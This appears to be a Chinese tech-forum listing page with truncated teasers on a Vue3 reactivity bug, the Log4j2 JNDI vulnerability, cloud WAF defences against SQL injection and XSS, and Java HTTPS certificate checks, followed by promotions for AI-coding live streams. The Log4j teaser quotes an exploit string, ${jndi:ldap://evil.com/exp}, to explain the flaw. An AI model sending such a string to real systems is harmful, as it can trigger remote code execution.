- 人们眼中的天才之所以卓越非凡,并非天资超人一等而是付出了持续不断的努力。1万小时的锤炼是任何人从平凡变成超凡的必要条件。———— 马尔科姆·格拉德威尔🌟 Hello,我是Xxtaoaooo!🌈 “代码是逻辑的诗篇,架构是思想的交响” 摘要最近在团队Vue3项目中遇到了一个极其诡异的响应式失效问题。这个bug的表现形式让人困惑:数据明明已经更新,但视图却没有重新渲染,而且这种现象只在特定的... 人们眼中的天才之所以卓越非凡,并非天资超人一等而是付出了持续不断的努力。1万小时的锤炼是任何人从平凡变成超凡的必要条件。———— 马尔科姆·格拉德威尔🌟 Hello,我是Xxtaoaooo!🌈 “代码是逻辑的诗篇,架构是思想的交响” 摘要最近在团队Vue3项目中遇到了一个极其诡异的响应式失效问题。这个bug的表现形式让人困惑:数据明明已经更新,但视图却没有重新渲染,而且这种现象只在特定的...
- Log4j2漏洞的本质与攻击特征2021年底爆发的Apache Log4j2远程代码执行漏洞(CVE-2021-44228)彻底改变了业界对基础组件安全性的认知。该漏洞源于日志处理中的JNDI动态解析机制:当日志内容包含${jndi:ldap://evil.com/exp}类表达式时,Log4j2会主动向恶意LDAP服务器发起请求,加载并执行远程代码。这种设计本意是提供灵活的配置能力,却成... Log4j2漏洞的本质与攻击特征2021年底爆发的Apache Log4j2远程代码执行漏洞(CVE-2021-44228)彻底改变了业界对基础组件安全性的认知。该漏洞源于日志处理中的JNDI动态解析机制:当日志内容包含${jndi:ldap://evil.com/exp}类表达式时,Log4j2会主动向恶意LDAP服务器发起请求,加载并执行远程代码。这种设计本意是提供灵活的配置能力,却成...
- 在瞬息万变的网络攻防战场上,SQL注入(SQLi) 与 跨站脚本攻击(XSS) 如同两柄淬毒的古老匕首,历久弥新,持续威胁着Web应用的安全命脉。面对海量请求与日益精进的攻击手法,传统规则库防御常陷入“误杀”与“漏网”的困境。华为云WAF(Web应用防火墙)凭借其深度语义分析、智能行为建模与云原生弹性防御体系,为开发者提供了一把精准切割威胁的手术刀。本文将深入剖析其防御机制,结合实战场景,揭... 在瞬息万变的网络攻防战场上,SQL注入(SQLi) 与 跨站脚本攻击(XSS) 如同两柄淬毒的古老匕首,历久弥新,持续威胁着Web应用的安全命脉。面对海量请求与日益精进的攻击手法,传统规则库防御常陷入“误杀”与“漏网”的困境。华为云WAF(Web应用防火墙)凭借其深度语义分析、智能行为建模与云原生弹性防御体系,为开发者提供了一把精准切割威胁的手术刀。本文将深入剖析其防御机制,结合实战场景,揭...
- 背景由于安全方面的需求,针对java发起的接口请求,需要使用https请求,同时需要进行证书校验,确保请求访问可信。但是经过调研发现,基本上很难有人说清楚该怎么校验,没有完整的模板套件,直接拿来用。综合整理下来,感觉原因无非1.与https的证书校验,如果需要达到百分百的校验,其实还是比较复杂的。 2.java后端请求有很多种请求方式,每种方式的使用的类,校验方式又不同,又进一步增加了复杂性... 背景由于安全方面的需求,针对java发起的接口请求,需要使用https请求,同时需要进行证书校验,确保请求访问可信。但是经过调研发现,基本上很难有人说清楚该怎么校验,没有完整的模板套件,直接拿来用。综合整理下来,感觉原因无非1.与https的证书校验,如果需要达到百分百的校验,其实还是比较复杂的。 2.java后端请求有很多种请求方式,每种方式的使用的类,校验方式又不同,又进一步增加了复杂性...
上滑加载中
推荐直播
-
华为云码道 × 仓颉编程:工程化AI编码探索2026/05/27 周三 19:00-21:00
刘俊杰-华为云仓颉语言专家/李炎-华为云码道技术专家/王智鹏-OpenCangjie开源社区发起人
本场直播围绕华为云仓颉语言与华为云码道的深度结合,展示华为云智能编程从零基础到高效落地的完整生态能力。以华为云码道为引擎,仓颉语言为载体,带给大家日常提效、趣味创新到极速量产的开发体验。
回顾中 -
一个AI团队帮你写代码:华为云码道Agent Space实战2026/06/25 周四 19:00-21:00
张翰文-华为云码道工程师/郭英旭-青软创新科技集团股份有限公司 软件架构师
本场直播聚焦华为云码道Agent Space两大模式:研发办公、代码开发,亲身体验从需求到代码的AI自动化能力。实操演示基于华为 CodeArts CLI,依托 OpenSpec 规格体系从零搭建业务项目。
即将直播
热门标签